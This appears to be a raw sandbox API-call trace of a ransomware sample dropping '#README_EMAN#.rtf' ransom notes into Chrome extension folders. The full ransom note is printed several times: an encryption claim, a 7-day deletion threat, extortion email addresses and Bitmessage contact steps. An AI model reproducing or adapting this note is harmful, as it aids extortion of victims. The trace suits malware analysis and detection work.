GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.586] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.587] CloseHandle (hObject=0x2c8) returned 1 [0278.587] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\#readme_eman#.rtf")) returned 0xffffffff [0278.587] GetLastError () returned 0x2 [0278.587] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.588] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.588] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.588] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up 